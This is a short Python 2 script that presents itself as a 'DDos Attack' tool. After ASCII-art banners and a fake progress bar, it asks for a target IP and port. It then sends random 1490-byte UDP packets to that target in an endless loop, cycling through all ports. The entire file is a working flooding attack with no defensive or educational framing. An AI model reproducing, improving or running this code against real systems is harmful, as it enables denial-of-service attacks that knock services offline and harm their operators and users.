import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############                                                                                                                                                                                                                                                                                                                                                                                        

os.system("clear")
os.system("figlet DDos Attack")
print('''                                                                                                                                                                                                                                                                                         


  _____  _____  ______ _____        _____  _____ _   _  _____   _______ _    _ ______         _______ _______       _____ _  __
 |  __ \|  __ \|  ____|  __ \ /\   |  __ \|_   _| \ | |/ ____| |__   __| |  | |  ____|     /\|__   __|__   __|/\   / ____| |/ /
 | |__) | |__) | |__  | |__) /  \  | |__) | | | |  \| | |  __     | |  | |__| | |__       /  \  | |     | |  /  \ | |    | ' / 
 |  ___/|  _  /|  __| |  ___/ /\ \ |  _  /  | | | . ` | | |_ |    | |  |  __  |  __|     / /\ \ | |     | | / /\ \| |    |  <  
 | |    | | \ \| |____| |  / ____ \| | \ \ _| |_| |\  | |__| |    | |  | |  | | |____   / ____ \| |     | |/ ____ \ |____| . \ 
 |_|    |_|  \_\______|_| /_/    \_\_|  \_\_____|_| \_|\_____|    |_|  |_|  |_|______| /_/    \_\_|     |_/_/    \_\_____|_|\_\
                                                                                                                               
                                                                                                                               
                                                            

''')
ip = raw_input("USER IP : ")
port = input("USER PORT   : ")

os.system("clear")
print "[                    ] 0% "
time.sleep(5)
print "[=====               ] 25%"
time.sleep(5)
print "[==========          ] 50%"
time.sleep(5)
print "[===============     ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
print('''

        _______ _______       _____ _  __  _              _    _ _   _  _____ _    _ ______ _____  
     /\|__   __|__   __|/\   / ____| |/ / | |        /\  | |  | | \ | |/ ____| |  | |  ____|  __ \ 
    /  \  | |     | |  /  \ | |    | ' /  | |       /  \ | |  | |  \| | |    | |__| | |__  | |  | |
   / /\ \ | |     | | / /\ \| |    |  <   | |      / /\ \| |  | | . ` | |    |  __  |  __| | |  | |
  / ____ \| |     | |/ ____ \ |____| . \  | |____ / ____ \ |__| | |\  | |____| |  | | |____| |__| |
 /_/    \_\_|     |_/_/    \_\_____|_|\_\ |______/_/    \_\____/|_| \_|\_____|_|  |_|______|_____/ 
                                                                                                                                                                                                                                                                                                                                                                                
''')                                                                                             
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     port = port + 1
     print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
     if port == 65534:
       port = 1
